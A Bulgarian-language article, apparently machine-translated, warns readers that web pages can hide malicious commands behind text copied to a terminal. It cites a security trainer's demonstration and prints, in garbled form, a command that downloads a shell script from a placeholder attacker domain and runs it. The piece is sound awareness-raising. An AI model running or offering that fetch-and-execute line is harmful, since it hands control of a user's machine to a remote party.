- Всички копираме и поставяме от интернет ежедневно, без всъщност да знаем рисковете.
- Експерт по сигурността отдели време, за да покаже на всички най-лошия сценарий, когато прави това.
- Поставянето на команди, които сте получили от интернет във вашия терминал, е бърз начин да бъдете хакнати
- Командите, които смятате, че поставяте във вашия терминал, всъщност са злонамерени кодове.
Вярно е, че живеем в ера, в която скоростта е всичко, а постигането на бързи резултати е всичко, което има значение. Въпреки това, малко хора всъщност спират за секунда и мислят за последствията.
Ежедневно милиони програмисти, администратори и изследователи по сигурността изпълняват прости задачи като копиране и поставяне на команди от уеб страници директно в конзолите на своите компютри.
Въпреки че мнозина дори не се замислят за това, последствията са по-големи и по-опасни, отколкото може да си помислите в началото, особено ако съхранявате чувствителни или ценни данни.
Известен експерт по сигурността отдели време да сподели какво всъщност може да се случи ако копирате и поставите съдържание от уеб страници.
Copy+Paste е лесен начин наистина да бъдете хакнат
Габриел Фридлендър, който е основател на платформата за обучение по сигурността Wizer, свали корицата от схема, която ще ви накара да помислите два пъти, преди да копирате и поставите команди от уеб страници.
Копирането и поставянето на съдържание от интернет стана толкова често срещано в днешно време, че никой дори не се замисля.
Въпреки това Фридлендър предупреждава, че някои уеб страници са по-измамни, отколкото човек може да осъзнае в началото и това, което смятате, че сте копирали от него, е много различно от това, което всъщност сте направили.
И по-лошото във всичко това е, че без необходимите знания или насоки, жертвите осъзнават грешката си едва след поставянето на текста, в който момент вече може да е твърде късно.
Анализаторът по сигурността също измисли малък тест за читателите на своя блог, само за да могат хората да разберат колко лесно е за вас да отворите неволно вратата за киберпрестъпници.
Той предостави команда, която е предназначена за копиране, но истината се разкрива само когато поставите текста и видите какво всъщност сте въвели във вашата настройка.
След като копирате командата, показана на екранната снимка по-горе, резултатът от поставянето й ще ви шокира, тъй като е далеч от това, което сте мислили, че дублирате.
къдрица http://attacker-domain: 8000/shell.sh | шОсвен напълно различната команда, присъстваща във вашия клипборд, символът за нов ред (или връщане) at краят му означава, че горният пример ще се изпълни веднага след като бъде поставен директно в Linux терминал.
Така че по-добре бъдете по-наясно какво всъщност се случва и третирайте това като сериозна опасност за безопасността. Не казваме, че всички уебсайтове крият злонамерено съдържание, но си струва да вземем това под внимание.
Случвало ли ви се е да сте били хакнати от поставяне на хитри команди във вашия терминал? Споделете своя опит с нас в секцията за коментари по-долу.
